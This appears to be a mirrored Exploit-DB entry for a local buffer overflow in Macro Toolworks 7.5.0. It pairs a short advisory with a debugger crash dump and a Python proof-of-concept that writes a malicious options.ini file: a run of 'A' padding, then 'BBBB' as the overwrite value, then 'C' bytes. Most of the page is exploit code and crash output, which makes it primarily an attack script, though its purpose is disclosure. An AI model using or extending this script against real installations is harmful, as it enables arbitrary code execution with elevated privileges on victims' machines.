Macro Toolworks 7.5 – Local Buffer Overflow

• Exploit Database
• 115 阅读

• 作者： Julien Ahrens
  日期： 2012-03-08
• 类别：

  • local
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/36928/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76

  source: https://www.securityfocus.com/bid/52351/info   Macro Toolworks is prone to a local buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied data.   Local attackers can exploit this issue to run arbitrary code with elevated privileges. Failed exploit attempts can result in a denial-of-service condition.   Macro Toolworks 7.5.0 is vulnerable; other versions may also be affected.   #!/usr/bin/python # Exploit Title: Pitrinec Software Macro Toolworks Free/Standard/Pro v7.5.0 Local Buffer Overflow # Version: 7.5.0 # Date:2012-03-04 # Author:Julien Ahrens # Homepage:http://www.inshell.net # Software Link: http://www.macrotoolworks.com # Tested on: Windows XP SP3 Professional German / Windows 7 SP1 Home Premium German # Notes: Overflow occurs in _prog.exe, vulnerable are all Pitrinec applications on the same way. # Howto: Copy options.ini to App-Dir --> Launch   # 646D36: The instruction at 0x646D36 referenced memory at 0x42424242. The memory could not be read -> 42424242 (exc.code c0000005, tid 3128)   # Registers: # EAX 0120EA00 Stack[000004C8]:0120EA00 # EBX FFFFFFFF # ECX 42424242 # EDX 00000002 # ESI 007F6348 _prog.exe:007F6348 # EDI 007F6348 _prog.exe:007F6348 # EBP 0120EA0C Stack[000004C8]:0120EA0C # ESP 0120E9E8 Stack[000004C8]:0120E9E8 # EIP 00646D36 _prog.exe:00646D36 # EFL 00200206   # Stack: # 0120E9E00012DF3C # 0120E9E400000000 # 0120E9E80205A5A0debug045:0205A5A0 # 0120E9EC1B879EF8 # 0120E9F0007F6348_prog.exe:007F6348 # 0120E9F4007F6348_prog.exe:007F6348   # Crash: # _prog.exe:00646D36 ; --------------------------------------------------------------------------- # _prog.exe:00646D36 mov eax, [ecx] # _prog.exe:00646D38 calldword ptr [eax+0Ch] # _prog.exe:00646D3B callnear ptr unk_6750D0 # _prog.exe:00646D40 retn4 # _prog.exe:00646D40 ; ---------------------------------------------------------------------------   # Dump: # 007F638041 41 41 41 41 41 41 4141 41 41 41 41 41 41 41AAAAAAAAAAAAAAAA # 007F639041 41 41 41 41 41 41 4141 41 41 41 41 41 41 41AAAAAAAAAAAAAAAA # 007F63A042 42 42 42 43 43 43 4343 43 43 43 43 43 43 43BBBBCCCCCCCCCCCC # 007F63B043 43 43 43 43 43 43 4343 43 43 43 43 43 43 43CCCCCCCCCCCCCCCC # 007F63C043 43 43 43 43 43 43 4343 43 43 43 43 43 43 43CCCCCCCCCCCCCCCC   file="options.ini"   junk1="\x41" * 744 boom="\x42\x42\x42\x42" junk2="\x43" * 100   poc="[last]\n" poc=poc + "file=" + junk1 + boom + junk2   try: print "[*] Creating exploit file...\n" writeFile = open (file, "w") writeFile.write( poc ) writeFile.close() print "[*] File successfully created!" except: print "[!] Error while creating file!"